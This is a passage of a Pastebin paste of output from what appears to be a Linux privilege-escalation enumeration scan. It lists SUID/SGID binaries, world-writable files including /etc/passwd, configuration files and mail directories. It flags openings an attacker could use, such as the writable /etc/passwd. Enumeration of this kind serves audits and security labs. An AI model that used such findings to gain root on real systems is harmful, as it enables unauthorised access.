  563. -rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
  564. -rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
  565. -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
  566. -rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
  567. -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
  568. -rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
  569. -rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
  570. -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
  571. -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
  572. -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
  573. -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
  574. -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
  575. -rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
  576. -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
  577. -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
  578. -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
  579.  
  580.  
  581. GUID files:
  582. -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
  583. -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-lock
  584. -rwxr-sr-x 1 root utmp 406700 Nov 7 2013 /usr/bin/screen
  585. -rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
  586. -rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
  587. -rwxr-sr-x 1 root ssh 329144 Aug 11 2016 /usr/bin/ssh-agent
  588. -rwxr-sr-x 1 root shadow 53516 May 17 02:38 /usr/bin/chage
  589. -rwxr-sr-x 1 root tty 18056 Nov 24 2016 /usr/bin/wall
  590. -rwxr-sr-x 1 root shadow 18208 May 17 02:38 /usr/bin/expiry
  591. -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-unlock
  592. -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-touchlock
  593. -rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
  594. -rwxr-sr-x 1 root mail 13960 Dec 7 2013 /usr/bin/dotlockfile
  595. -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
  596. -rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd
  597.  
  598.  
  599. World-writable files (excluding /proc):
  600. -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
  601. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
  602. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
  603. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
  604. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
  605. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
  606. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
  607. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
  608. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
  609. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
  610. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
  611. -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
  612.  
  613.  
  614. Can't search *.conf files as no keyword was entered
  615.  
  616. Can't search *.log files as no keyword was entered
  617.  
  618. Can't search *.ini files as no keyword was entered
  619.  
  620. All *.conf files in /etc (recursive 1 level):
  621. -rw-r--r-- 1 root root 144 May 28 22:13 /etc/kernel-img.conf
  622. -rw-r--r-- 1 root root 321 Apr 16 2014 /etc/blkid.conf
  623. -rw-r--r-- 1 root root 191 Dec 4 2013 /etc/libaudit.conf
  624. -rw-r--r-- 1 root root 1320 Aug 19 2014 /etc/rsyslog.conf
  625. -rw-r--r-- 1 root root 1260 Jul 1 2013 /etc/ucf.conf
  626. -rw-r--r-- 1 root root 92 Feb 20 2014 /etc/host.conf
  627. -rw-r--r-- 1 root root 4781 Nov 15 2013 /etc/hdparm.conf
  628. -rw-r--r-- 1 root root 2584 Oct 10 2012 /etc/gai.conf
  629. -rw-r--r-- 1 root root 350 May 28 22:00 /etc/popularity-contest.conf
  630. -rw-r--r-- 1 root root 7788 May 28 22:00 /etc/ca-certificates.conf
  631. -rw-r--r-- 1 root root 552 Feb 1 2014 /etc/pam.conf
  632. -rw-r--r-- 1 root root 2084 Apr 1 2013 /etc/sysctl.conf
  633. -rw-r--r-- 1 root root 956 Feb 19 2014 /etc/mke2fs.conf
  634. -rw-r--r-- 1 root root 321 Jun 20 2013 /etc/updatedb.conf
  635. -rw-r--r-- 1 root root 14867 May 10 2014 /etc/ltrace.conf
  636. -rw-r--r-- 1 root root 604 Nov 7 2013 /etc/deluser.conf
  637. -rw-r--r-- 1 root root 34 Aug 3 2016 /etc/ld.so.conf
  638. -rw-r--r-- 1 root root 2969 Feb 23 2014 /etc/debconf.conf
  639. -rw-r--r-- 1 root root 475 Feb 20 2014 /etc/nsswitch.conf
  640. -rw-r--r-- 1 root root 2981 Aug 3 2016 /etc/adduser.conf
  641. -rw-r----- 1 root fuse 280 May 24 2013 /etc/fuse.conf
  642. -rw-r--r-- 1 root root 703 Jan 22 2014 /etc/logrotate.conf
  643. -rw-r--r-- 1 root root 771 May 19 2013 /etc/insserv.conf
  644.  
  645.  
  646. Any interesting mail in /var/mail:
  647. total 8
  648. drwxrwsr-x 2 root mail 4096 Aug 3 2016 .
  649. drwxr-xr-x 14 root root 4096 May 29 18:41 ..
  650.  
  651.  
  652. ### SCAN COMPLETE ####################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!